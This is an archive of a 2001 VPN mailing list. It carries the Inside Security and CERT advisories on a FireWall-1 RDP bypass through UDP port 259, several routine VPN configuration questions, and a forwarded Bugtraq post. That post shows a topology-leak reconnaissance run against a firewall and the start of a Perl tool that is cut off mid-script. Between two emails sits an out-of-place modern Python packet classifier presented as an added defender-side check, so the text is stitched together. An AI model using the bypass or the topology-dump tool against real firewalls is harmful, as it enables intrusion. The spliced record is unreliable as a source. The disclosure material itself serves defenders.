http://www.inside-security.de/advisories/fw1_rdp.html

-----------------------------------------------
Check Point FireWall-1 RDP Bypass Vulnerability
-----------------------------------------------

Summary:

It is possible to bypass FireWall-1 with faked RDP packets if the default implied rules are being used. RDP (Reliable Data Protocol, but not the one specified in RFC 908, a Check Point proprietary one) is used by FireWall-1 on top of the User Datagram Protocol (UDP) to establish encrypted sessions. FireWall-1 management rules allow arbitrary eitherbound RDP connections to traverse the firewall. Only the destination port (259) and the RDP command are verified by FireWall-1. By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall. Implied rules can't be easily modified or removed (except all together) with the FireWall-1 policy editor.

Impact:

Given access to hosts on both sides of a firewall, a tunnel to bypass the firewall could be built using this vulnerability. Such access could be gained with a trojan horse that uses this vulnerability to connect from the inside back to the machine of the attacker. But also arbitrary connections from the outside to machines behind the firewall (even if they are supposedly totally blocked from the in- and outside by the firewall) can be established, for example to communicate with infiltrated programs like viruses.
Affected systems:

Check Point VPN-1(TM) & FireWall-1(R) Version 4.1

Releases tested:

Build 41439 [VPN + DES]
Build 41439 [VPN + DES + STRONG]
Build 41716 [VPN + DES + STRONG] (SP2)

Vendor status:

The vulnerability has been reported to Check Point and a fix is scheduled for today. We want to thank Check Point Software Technologies for their quick reaction.

Detailed description:

As FireWall-1 rulesets are created they are translated into the INSPECT language (similar to C) and by default include the file $FWDIR/lib/base.def which itself includes $FWDIR/lib/crypt.def in line 259. Together they define protocol names and the so called implied rules (for FireWall-1 management). In line 62 the macro accept_fw1_rdp is defined to accept any eitherbound connection that matches the following characteristics:

- Protocol UDP
- Destination port 259 (RDP)
- RDP Command RDPCRYPTCMD (100), RDPCRYPT_RESTARTCMD (101), RDPUSERCMD (150) or RDPSTATUSCMD (128).

The RDP command types RDPCRYPT = {RDPCRYPTCMD,RDPUSERCMD,RDPSTATUSCMD} and RDPCRYPT_RESTART = {RDPCRYPT_RESTARTCMD} will permit traversal of faked RDP packets (regardless of the value of NO_ENCRYPTION_FEATURES, undefined by default).

Proof of concept code:

Proof of concept code has been submitted to Check Point. We are planning to make this code publicly available within a few days.

Suggested workarounds:

- Comment line 2646 of crypt.def ( accept_fw1_rdp; )
- Deactivate implied rules in the Check Point policy editor (and build your own rules for management connections).
- Block UDP traffic to port 259 on your perimeter router.

Credits:

This vulnerability was found and documented by Jochen Thomas Bauer and Boris Wesslowski of Inside Security GmbH, Stuttgart, Germany.

------------------------------------------------------------------------
(C) 2001 Inside Security GmbH

This notice may be redistributed freely provided that redistributed copies are complete and unmodified, and include all date and version information.
ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL INSIDE SECURITY GMBH BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF INSIDE SECURITY GMBH HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction.
------------------------------------------------------------------------

From Joel.Snyder at Opus1.COM Mon Jul 9 18:54:42 2001
From: Joel.Snyder at Opus1.COM (Joel M Snyder)
Date: Mon, 09 Jul 2001 15:54:42 -0700 (MST)
Subject: IPSec between PIX and the Nokia CC500
In-Reply-To: "Your message dated Mon, 09 Jul 2001 11:26:02 +0200 (CEST)"
Message-ID: <01K5QE09UE60934PJM@Opus1.COM>

>Has anyone information to share about the subject? (IKE + IPSec)

What do you want to know? It works great with both pre-shared secrets and certificates. I tested it as recently as last week using DHG2/PFS/3DES/SHA1 and had no problem initiating an SA from either side.
jms

Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719
Phone: +1 520 324 0494 x101 (v) +1 520 324 0495 (FAX)
jms at Opus1.COM http://www.opus1.com/jms Opus One

From tbird at precision-guesswork.com Wed Jul 11 13:28:05 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Wed, 11 Jul 2001 12:28:05 -0500 (CDT)
Subject: Win2k IPsec Troubleshooting

http://support.microsoft.com/support/kb/articles/Q257/2/25.ASP

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

From rahul_next at hotmail.com Thu Jul 12 00:57:20 2001
From: rahul_next at hotmail.com (Rahul 18)
Date: Thu, 12 Jul 2001 12:57:20 +0800
Subject: Question on VPN!!!!!!

Hello my name is Jay from Malaysia... I am in college and have problems not
>only in questions about Virtual Private Networking but also have an
>assignment on which need a lot of explanation on VPN...
>
>1) What is VPN? Explain how VPN benefits an organization?
>2) Identify at least 2 items at each site that need to be upgraded
>3) Identify the necessary intermediate telecommunication facilities
>   required to establish the VPN
>4) Briefly outline the future expansion of the above VPN to help drive
>   a company participating in E-Commerce businesses
>
>Hope some questions for my assignments will be answered as well as some of
>my personal questions for my better understanding.
>
>I really like to take this time to congratulate you on having the best site
>on VPN information. I think almost all my friends know about your site.
>
>Hope you mail me As Soon As Possible
>Yours truly,
>Jay

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
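The implied-rule match that the Inside Security advisory forwarded above describes (UDP, destination port 259, RDP command 100/101/150/128), as an added defender-side check that is not code from the advisory, Check Point or anyone on this list: it parses raw IPv4/UDP datagrams (constructed samples inline), reports whether the implied rule as described would accept a packet, and whether the advisory's interim workaround of blocking UDP/259 at the perimeter router would drop it. The page does not give the layout of the proprietary RDP header, so treating the first UDP payload byte as the command field, the sample addresses and all function names are assumptions made for this example.

```python
"""Added defender-side check, not code from the advisory or from Check Point:
classify raw IPv4 datagrams against the FireWall-1 4.1 implied rule described
above (UDP, destination port 259, RDP command 100/101/150/128)."""
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

IPPROTO_UDP = 17
RDP_PORT = 259
# Command values and names as listed in the advisory's "Detailed description".
RDP_COMMANDS = {
    100: "RDPCRYPTCMD",
    101: "RDPCRYPT_RESTARTCMD",
    150: "RDPUSERCMD",
    128: "RDPSTATUSCMD",
}


@dataclass
class Verdict:
    src: str
    dst: str
    dport: Optional[int]
    command: Optional[int]
    implied_rule_accepts: bool
    reason: str


def _dotted(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_ipv4(pkt: bytes) -> Optional[Tuple[str, str, int, Optional[int], bytes]]:
    """Return (src, dst, proto, udp_dport, udp_payload); dport is None and the
    payload empty when the datagram is not UDP.  Checksums are not verified."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        return None
    proto = pkt[9]
    src, dst = _dotted(pkt[12:16]), _dotted(pkt[16:20])
    if proto != IPPROTO_UDP or len(pkt) < ihl + 8:
        return src, dst, proto, None, b""
    _sport, dport, ulen = struct.unpack("!HHH", pkt[ihl:ihl + 6])
    return src, dst, proto, dport, pkt[ihl + 8:ihl + max(ulen, 8)]


def classify(pkt: bytes) -> Optional[Verdict]:
    """Would the implied rule accept_fw1_rdp, as the advisory describes it, pass
    this datagram?  Only port and command are examined, which is exactly the
    weakness: the rest of the UDP payload is never looked at."""
    parsed = parse_ipv4(pkt)
    if parsed is None:
        return None
    src, dst, proto, dport, payload = parsed
    if proto != IPPROTO_UDP:
        return Verdict(src, dst, None, None, False, "not UDP")
    if dport != RDP_PORT:
        return Verdict(src, dst, dport, None, False, "destination port is not 259")
    # ASSUMPTION: the advisory does not document the proprietary RDP header
    # layout; this example treats the first UDP payload byte as the command.
    command = payload[0] if payload else None
    if command in RDP_COMMANDS:
        return Verdict(src, dst, dport, command, True,
                       f"UDP/259 with command {RDP_COMMANDS[command]} ({command}): "
                       "accepted regardless of the remaining content")
    return Verdict(src, dst, dport, command, False,
                   "UDP/259 but command not in the accepted set")


def perimeter_acl_drops(pkt: bytes) -> bool:
    """The advisory's interim workaround: block all UDP traffic to port 259."""
    parsed = parse_ipv4(pkt)
    return parsed is not None and parsed[2] == IPPROTO_UDP and parsed[3] == RDP_PORT


def build_ipv4(src: str, dst: str, proto: int, l4: bytes) -> bytes:
    """Construct a minimal IPv4 datagram (checksum left zero) as sample input."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0,
                      bytes(int(x) for x in src.split(".")),
                      bytes(int(x) for x in dst.split(".")))
    return hdr + l4


def build_udp(sport: int, dport: int, payload: bytes) -> bytes:
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload


# Constructed sample datagrams (documentation address ranges, made up here).
SAMPLES = {
    # Shaped like FireWall-1 management traffic: UDP/259, command RDPCRYPTCMD.
    "mgmt_like": build_ipv4("10.0.0.5", "192.0.2.1", IPPROTO_UDP,
                            build_udp(40000, RDP_PORT, bytes([100]) + b"\x00" * 7)),
    # Ordinary DNS query header: not port 259, so the implied rule is not involved.
    "dns": build_ipv4("10.0.0.5", "192.0.2.53", IPPROTO_UDP,
                      build_udp(40001, 53, b"\x12\x34\x01\x00" + b"\x00" * 8)),
    # UDP/259 whose first byte is outside the accepted command set.
    "udp259_other": build_ipv4("198.51.100.7", "10.0.0.9", IPPROTO_UDP,
                               build_udp(5000, RDP_PORT, bytes([7, 0, 0]))),
}
```

Because the rule cannot tell genuine management traffic from anything else carrying a matching command byte, a perimeter alert on every UDP/259 datagram, or the router block the advisory suggests, is the practical interim control until the vendor fix is applied.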
From shope at energis-eis.co.uk Thu Jul 12 09:17:48 2001
From: shope at energis-eis.co.uk (Stephen Hope)
Date: Thu, 12 Jul 2001 14:17:48 +0100
Subject: CERT Advisory CA-2001-17
Message-ID: <73BE32DA9E55D511ACF30050BAEA04870494E2@email.datarange.co.uk>

Liam,

I believe that this "RDP" is a proprietary protocol used by Checkpoint rather than the RFC compliant RDP.

regards

Stephen

Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk
Carrington Business Park, Carrington, Manchester, UK. M31 4ZU
Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189

> -----Original Message-----
> From: Liam Randall [mailto:lrandall at isa-inc.com]
> Sent: 09 July 2001 20:44
> To: vpn at securityfocus.com
> Subject: FW: CERT Advisory CA-2001-17
>
> Everyone catch this yet:
>
> -----Original Message-----
> From: CERT Advisory [mailto:cert-advisory at cert.org]
> Sent: Monday, July 09, 2001 1:33 PM
> To: cert-advisory at cert.org
> Subject: CERT Advisory CA-2001-17
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability
>
> Original release date: July 09, 2001
> Last revised: --
> Source: CERT/CC
>
> A complete revision history is at the end of this file.
>
> Systems Affected
>
> * Check Point VPN-1 and FireWall-1 Version 4.1
>
> Overview
>
> A vulnerability in Check Point FireWall-1 and VPN-1 may allow an intruder to pass traffic through the firewall on port 259/UDP.
>
> I. Description
>
> Inside Security GmbH has discovered a vulnerability in Check Point FireWall-1 and VPN-1 that allows an intruder to bypass the firewall. The default FireWall-1 management rules allow arbitrary RDP (Reliable Data Protocol) connections to traverse the firewall. RFC-908 and RFC-1151 describe the Reliable Data Protocol (RDP).
> Quoting from RFC-908:
>
>     The Reliable Data Protocol (RDP) is designed to provide a reliable data transport service for packet-based applications such as remote loading and debugging.
>
> RDP was designed to have much of the same functionality as TCP, but it has some advantages over TCP in certain situations. FireWall-1 and VPN-1 include support for RDP, but they do not provide adequate security controls. Quoting from the advisory provided by Inside Security GmbH:
>
>     By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall.
>
> For more information, see the Inside Security GmbH security advisory, available at
>
>     http://www.inside-security.de/advisories/fw1_rdp.html
>
> Although the CERT/CC has not seen any incident activity related to this vulnerability, we do recommend that all affected sites upgrade their Check Point software as soon as possible.
>
> II. Impact
>
> An intruder can pass UDP traffic with arbitrary content through the firewall on port 259 in violation of implied security policies.
>
> If an intruder can gain control of a host inside the firewall, he may be able to use this vulnerability to tunnel arbitrary traffic across the firewall boundary.
>
> Additionally, even if an intruder does not have control of a host inside the firewall, he may be able to use this vulnerability as a means of exploiting another vulnerability in software listening passively on the internal network.
>
> Finally, an intruder may be able to use this vulnerability to launch certain kinds of denial-of-service attacks.
>
> III. Solutions
>
> Install a patch from Check Point Software Technologies. More information is available in Appendix A.
>
> Until a patch can be applied, you may be able to reduce your exposure to this vulnerability by configuring your router to block access to 259/UDP at your network perimeter.
>
> Appendix A
>
> Check Point
>
> Check Point has issued an alert for this vulnerability at
>
>     http://www.checkpoint.com/techsupport/alerts/
>
> Download the patch from Check Point's web site:
>
>     http://www.checkpoint.com/techsupport/downloads.html
>
> Appendix B. - References
>
> 1. http://www.inside-security.de/advisories/fw1_rdp.html
> 2. http://www.kb.cert.org/vuls/id/310295
> 3. http://www.ietf.org/rfc/rfc908.txt
> 4. http://www.ietf.org/rfc/rfc1151.txt
> _________________________________________________________________
>
> Our thanks to Inside Security GmbH for the information contained in their advisory.
> _________________________________________________________________
>
> This document was written by Ian A. Finlay. If you have feedback concerning this document, please send email to:
>
>     mailto:cert at cert.org?Subject=Feedback CA-2001-17 [VU#310295]
>
> Copyright 2001 Carnegie Mellon University.
>
> Revision History
> July 09, 2001: Initial Release

From Phil.Cox at SystemExperts.com Thu Jul 12 23:43:57 2001
From: Phil.Cox at SystemExperts.com (Phil Cox)
Date: Thu, 12 Jul 2001 20:43:57 -0700
Subject: Wireless VPNs
In-Reply-To: <4.3.2.7.2.20010706144210.00b4fb50@mail2.netreach.net>

All,

I am doing research on Wireless VPN's. In particular I am looking for problems that people are having to overcome when developing and/or implementing them.
I can only really think of the following, and am looking for any others that folks have seen:

- Resources (CPU, Memory) on handhelds
- "Lossy"ness of wireless networks
- Lack of ability of deployed devices to support VPN clients (i.e., old phones and handhelds)

Any thoughts about problems, and potential solutions are appreciated.

Also, I would be very interested in any implementations that you use, and why you like them (or not).

Any and all comments are appreciated.

Phil

From shope at energis-eis.co.uk Mon Jul 16 06:24:47 2001
From: shope at energis-eis.co.uk (Stephen Hope)
Date: Mon, 16 Jul 2001 11:24:47 +0100
Subject: Wireless VPNs
Message-ID: <73BE32DA9E55D511ACF30050BAEA04870494F7@email.datarange.co.uk>

Phil,

a list of issues which came up with some stuff we were involved in. We were only doing "raw" wireless for LAN access in enterprise environments, rather than VPN on top of wireless. We were working with Cisco Aironet gear, but I suspect these points are more general.

1. Op sys integration - the wireless drivers were awkward to integrate into Win 95, especially in laptops already set up to use Xircom 100 M Ethernet. Much less hassle with Win 98.

2. Op sys stability - again Win 95 can have tantrums when the wireless link vanishes and applications lose their connections - seems to be a general problem that the op sys and apps make assumptions about connections not vanishing during use, and don't recover well.....

3. Roaming needs layer 2 connectivity between the access points. 1 customer wants their developers to be able to roam throughout a campus, but also just replaced an ATM backbone with a "pure" layer 3 switched campus. The roaming requirement means the wireless points need a single VLAN smeared over the campus, spanning tree to control the backbone resilience and loops, and generally doesn't fit into the layer 3 backbone design.
It doesn't help that there are 2 manufacturers' equipment involved, and no common VLANs across campus...

NB - the developers have found that they can take a laptop into a separate cafeteria on the other side of a public road and get a working link there (not enough meeting rooms) - but the security team didn't like the implications for security outside the building structure.

4. Dead spots. Things that have caused issues with coverage are: building design (get much better signal coverage along the girders in the floor / ceiling / wall rather than at 45 degree lines). Metalwork - computer rooms and storage racking seem to give problems. I didn't have any trouble with gold film coated windows, but that may depend on the amount of glass.

Generally, I have been pleasantly surprised about the way this stuff works - I expected more problems with black magic than we got in practice.

regards

Stephen

Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk
Carrington Business Park, Carrington, Manchester, UK. M31 4ZU
Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189

> -----Original Message-----
> From: Phil Cox [mailto:Phil.Cox at SystemExperts.com]
> Sent: 13 July 2001 04:44
> To: vpn at securityfocus.com
> Subject: Wireless VPNs
>
> All,
>
> I am doing research on Wireless VPN's. In particular I am looking for problems that people are having to overcome when developing and/or implementing them. I can only really think of the following, and am looking for any others that folks have seen:
>
> - Resources (CPU, Memory) on handhelds
> - "Lossy"ness of wireless networks
> - Lack of ability of deployed devices to support VPN clients (i.e., old phones and handhelds)
>
> Any thoughts about problems, and potential solutions are appreciated.
>
> Also, I would be very interested in any implementations that you use, and why you like them (or not).
>
> Any and all comments are appreciated.
>
> Phil

From Skip.Romero at ngb.army.mil Mon Jul 16 06:44:00 2001
From: Skip.Romero at ngb.army.mil (Romero, Skip Mr NGB-ARNG)
Date: Mon, 16 Jul 2001 06:44:00 -0400
Subject: Wireless VPNs
Message-ID: <56969875BA38D411940300204840ECE301187C76@NGB-66C05-XCH92>

Phil,

One of the most innovative solutions that government is using is the Blackberry (www.blackberry.net). This product has the required security features needed for government standards..

Regards...
Skip

Santos (Skip) Romero, DOD Certified FSO
Information Assurance Security Officer
National Guard Bureau, Information Systems Division
Senior Information Assurance Policy & Procedures Architect
Email: skip.romero at ngb.army.mil
www.ngb.dtic.mil
Member: Information Assurance Technical Forum (NSA) - www.iatf.net
FBI-INFRAGARD - www.infragard.net

-----Original Message-----
From: Phil Cox [SMTP:Phil.Cox at SystemExperts.com]
Sent: Thursday, July 12, 2001 11:44 PM
To: vpn at securityfocus.com
Subject: Wireless VPNs

All,

I am doing research on Wireless VPN's. In particular I am looking for problems that people are having to overcome when developing and/or implementing them. I can only really think of the following, and am looking for any others that folks have seen:

- Resources (CPU, Memory) on handhelds
- "Lossy"ness of wireless networks
- Lack of ability of deployed devices to support VPN clients (i.e., old phones and handhelds)

Any thoughts about problems, and potential solutions are appreciated.

Also, I would be very interested in any implementations that you use, and why you like them (or not).

Any and all comments are appreciated.

Phil

From jsdy at cospo.osis.gov Mon Jul 16 11:58:04 2001
From: jsdy at cospo.osis.gov (Joseph S D Yao)
Date: Mon, 16 Jul 2001 11:58:04 -0400
Subject: Question on VPN!!!!!!
In-Reply-To: ; from rahul_next@hotmail.com on Thu, Jul 12, 2001 at 12:57:20PM +0800
Message-ID: <20010716115804.D2360@washington.cospo.osis.gov>

On Thu, Jul 12, 2001 at 12:57:20PM +0800, Rahul 18 wrote:
> Hello my name is Jay from Malaysia... I am in college and have problems not
> >only in questions about Virtual Private Networking but also have an
> >assignment on which need a lot of explanation on VPN...
> >
> >1) What is VPN? Explain how VPN benefits an organization?
> >2) Identify at least 2 items at each site that need to be upgraded
> >3) Identify the necessary intermediate telecommunication facilities
> >   required to establish the VPN
> >4) Briefly outline the future expansion of the above VPN to help drive
> >   a company participating in E-Commerce businesses
> >
> >Hope some questions for my assignments will be answered as well as some of
> >my personal questions for my better understanding.
> >
> >I really like to take this time to congratulate you on having the best site
> >on VPN information. I think almost all my friends know about your site.
> >
> >Hope you mail me As Soon As Possible
> >Yours truly,
> >Jay

Rahul or Jay or whoever,

You really learn a lot better by NOT having people answer your homework questions.

A "virtual" network is carried by some technology over another network as if it were an actual physical network - but it's not. A private one is used by a limited number of people, vs. a public network. Some technologies for creating a virtual network include encapsulation, encryption and encapsulation, and use of another type of network such as ATM. Not all of these are commonly called VPN, however.

From this information, you may be able to piece together a definition of a VPN - but for a "correct" one, study your materials and the Web site. From this, you should also be able to answer the rest of the questions as well.

--
Joe Yao jsdy at cospo.osis.gov - Joseph S. D. Yao
OSIS Center Computer Support EMT-B
-----------------------------------------------------------------------
This message is not an official statement of COSPO policies.

From angus at tellme.com Mon Jul 16 18:10:57 2001
From: angus at tellme.com (Angus Davis)
Date: Mon, 16 Jul 2001 15:10:57 -0700
Subject: Red Creek Ravlin 10 / Checkpoint FW-1 Interoperability?
Message-ID: <3B536671.FF6D7ED2@tellme.com>

Hello,

We're pulling our hair out trying to get our Ravlin 10/5100 to behave nicely to run a VPN with our customer's Checkpoint FW-1. Does anyone have experience getting these two to work together? We've turned off aggressive mode on the FW1, we have PFS off, we have the latest version of the Ravlin firmware installed, shared-keys, etc. Still, we experience intermittent problems with or following rekey negotiation. Has anyone been able to get these two to co-exist?

Thanks in advance for any help,
-angus

From mikhail.sobolev at transas.com Tue Jul 17 12:11:51 2001
From: mikhail.sobolev at transas.com (Mikhail Sobolev)
Date: Tue, 17 Jul 2001 17:11:51 +0100
Subject: Requirements for a certificate to be used in PGPnet.
Message-ID: <20010717171151.A10810@transas.co.uk>

I'm struggling with PGPnet. Having successfully created the appropriate certificates, I am unable to use them in the PGPnet program. I tried to look for the information on the Internet, but failed.

The short version of my problem: when trying to specify my gateway's certificate, I get 'Invalid IASN for selected certificate'.

I would appreciate it if somebody could give me some hints.

Thanks,
--
Misha

PS I already tried several mailing lists, but got no response.
From Patrick.Bryan at abbott.com Tue Jul 17 12:35:30 2001
From: Patrick.Bryan at abbott.com (Patrick.Bryan at abbott.com)
Date: Tue, 17 Jul 2001 11:35:30 -0500
Subject: Hybrid WAN implementing VPN

Has anyone considered and/or successfully implemented a Hybrid WAN making use of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwidth between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome is that this creates a loop between the router and the VPN engine. Am I way off here?

From cgripp at axcelerant.com Tue Jul 17 13:03:46 2001
From: cgripp at axcelerant.com (Christopher Gripp)
Date: Tue, 17 Jul 2001 10:03:46 -0700
Subject: Hybrid WAN implementing VPN
Message-ID: <4EBB5C35607E7F48B4AE162D956666EF3390C3@guam.corp.axcelerant.com>

I would think the VPN box and router at both locations would have to understand that only certain ports are directed through the VPN.

Christopher S. Gripp
Systems Engineer
Axcelerant

-----Original Message-----
From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com]
Sent: Tuesday, July 17, 2001 9:36 AM
To: vpn at securityfocus.com
Subject: Hybrid WAN implementing VPN

Has anyone considered and/or successfully implemented a Hybrid WAN making use of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwidth between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site.
The issue I am trying to overcome is that this creates a loop between the router and the VPN engine. Am I way off here?

From sandy at storm.ca Tue Jul 17 13:30:03 2001
From: sandy at storm.ca (Sandy Harris)
Date: Tue, 17 Jul 2001 13:30:03 -0400
Subject: Hybrid WAN implementing VPN
Message-ID: <3B54761B.1B232314@storm.ca>

Patrick.Bryan at abbott.com wrote:
>
> Has anyone considered and/or successfully implemented a Hybrid WAN making use of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwidth between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site.
...

I don't have an answer to your questions, unless your routers are Linux boxes, in which case have a look at the advanced routing stuff in recent kernels.

However, you might want to consider the argument that in implementing a VPN, you should encrypt as much as you possibly can rather than just what seems necessary:

http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/ipsec.html#traffic.resist

I'm not sure how this might apply in your case, or even that it does, but it seemed worth mentioning.

From shope at energis-eis.co.uk Tue Jul 17 15:49:44 2001
From: shope at energis-eis.co.uk (Stephen Hope)
Date: Tue, 17 Jul 2001 20:49:44 +0100
Subject: Hybrid WAN implementing VPN
Message-ID: <73BE32DA9E55D511ACF30050BAEA0487049513@email.datarange.co.uk>

Patrick,

can't help directly, but I can give you some encouragement - it is feasible within a routed network. We have done this for low priority traffic using a UK-US link with backup via satellite.
What we did was build a "pure" routed link with the satellite costed so it was not the preferred path. We then used a traffic filter to select the stuff we wanted diverted (printer spool and mail server to server stuff in our case). If the VPN tunnel terminates on the router with the traffic filters, then the filter can be sensitive to "next hop" being available - that way the 2 links back each other up under fault conditions. Or, you can set up the filters to break the low priority stuff when the VPN is down...

I suggest you look at a router based VPN - you are going to want to have a routing protocol and traffic filters to control routes and fallback under fault conditions - static routes on the VPN gateway type systems will make your implementation more difficult.

regards

Stephen

Stephen Hope C. Eng, Network Consultant, shope at energis-eis.co.uk, Energis Integration Services Ltd, WWW: http://www.energis-eis.co.uk
Carrington Business Park, Carrington, Manchester, UK. M31 4ZU
Tel: +44 (0)161 776 4194 Mob: +44 (0)7767 256 180 Fax: +44 (0)161 776 4189

> -----Original Message-----
> From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com]
> Sent: 17 July 2001 17:36
> To: vpn at securityfocus.com
> Subject: Hybrid WAN implementing VPN
>
> Has anyone considered and/or successfully implemented a Hybrid WAN making use of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwidth between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome is that this creates a loop between the router and the VPN engine. Am I way off here?
From guy.raymakers at eds.com Wed Jul 18 02:35:26 2001
From: guy.raymakers at eds.com (Raymakers, Guy)
Date: Wed, 18 Jul 2001 07:35:26 +0100
Subject: Hybrid WAN implementing VPN

Patrick,

It's possible to do, we use it in combination with Satellite links and we don't have any troubles with routing loops.

Guy

-----Original Message-----
From: Patrick.Bryan at abbott.com [mailto:Patrick.Bryan at abbott.com]
Sent: Tuesday, July 17, 2001 18:36
To: vpn at securityfocus.com
Subject: Hybrid WAN implementing VPN

Has anyone considered and/or successfully implemented a Hybrid WAN making use of a VPN for non time sensitive / non critical data? For example, you have frame links between sites A, B, and C. Rather than increase bandwidth between sites, it seems to me that I can route secondary types of traffic over Lan-to-Lan VPN links. Using ftp as an example, it seems I would be able to set an input filter on my routers to forward any ftp traffic to VPN boxes at each site. The issue I am trying to overcome is that this creates a loop between the router and the VPN engine. Am I way off here?

From ng_son99 at hotmail.com Wed Jul 18 03:09:30 2001
From: ng_son99 at hotmail.com (Nguyen Son)
Date: Wed, 18 Jul 2001 15:09:30 +0800
Subject: How to test security of VPN
References: <56969875BA38D411940300204840ECE301187C76@NGB-66C05-XCH92>

Hi All,

I have one Window 2000 Server box (SP2) and I have set up a VPN. I am very new to VPN as well as Win 2k; now I have two problems:

1. Users can only access the server through dialup. I have tried to connect to the VPN server from a network but I got an error 650 saying that "The computer you're dialing in to does not respond to a network reques"

2. Is there any tool to test the security of the VPN and (or) the Windows box for known issues?
At the moment I am interested to see the encrypted password and user name, and how I can determine that packets sent through the other network are encrypted. How can I know whether the VPN is using PPTP or L2TP or IPSec?

If these questions are too broad to explain, can someone point out any good web sites or books for reference. If you need more info please ask.

TIA
Son

From tbird at precision-guesswork.com Wed Jul 18 10:25:10 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Wed, 18 Jul 2001 09:25:10 -0500 (CDT)
Subject: Firewall-1 Information leak (fwd)

People out there using SecureRemote and FireWall-1 for their remote access VPN:

---------- Forwarded message ----------
Date: Wed, 18 Jul 2001 03:29:28 +0200 (SAST)
From: Haroon Meer
To: bugtraq at securityfocus.com
Subject: Firewall-1 Information leak

Hi.

Checkpoint Firewall-1 makes use of a piece of software called SecureRemote to create encrypted sessions between users and FW-1 modules. Before remote users are able to communicate with internal hosts, a network topology of the protected network is downloaded to the client. While newer versions of the FW-1 software have the ability to restrict these downloads to only authenticated sessions, the default setting allows unauthenticated requests to be honoured.
This gives a potential attacker a wealth of information including ip addresses, network masks (and even friendly descriptions) The attached file will connect to the firewall, and download the toplogy (if SecureRemote is running) (it is a tiny perl file, which needs only Socket, so avoids the hassle of having to install the SecureRemote client to test a firewall-1) --snip-- SensePost# perl sr.pl firewall.victim.com Testing on port 256 :val ( :reply ( : (-SensePost-dotcom-.hal9000-19.3.167.186 :type (gateway) :is_fwz (true) :is_isakmp (true) :certificates () :uencapport (2746) :fwver (4.1) :ipaddr (19.3.167.186) :ipmask (255.255.255.255) :resolve_multiple_interfaces () :ifaddrs ( : (16.3.167.186) : (12.20.240.1) : (16.3.170.1) : (29.203.37.97) ) :firewall (installed) :location (external) :keyloc (remote) :userc_crypt_ver (1) :keymanager ( :type (refobj) :refname ("#_-SensePost-dotcom-") ) :name (-SensePost-dotcom-Neo16.3.167.189) :type (gateway) :ipaddr (172.29.0.1) :ipmask (255.255.255.255) ) --snip-- Haroon Meer +27 837866637 haroon at sensepost.com http://www.sensepost.com -------------- next part -------------- #!/usr/bin/perl # A Command-line tool that can be used to download network Topology # from Firewall-1's running SecureRemote, with the option "Allow un # authenticated cleartext topology downloads". 
# Usage sr.pl IP
# Haroon Meer & Roelof Temmingh 2001/07/17
# haroon at sensepost.com - http://www.sensepost.com

use Socket;

if ($#ARGV<0) {die "Usage: sr.pl IP\n";}
$port=256;
$host=$ARGV[0];                    # host name or IP given on the command line
$target=inet_aton($host);
print "Testing $host on port $port\n";

# Topology request, as a hex string; packed to raw bytes below
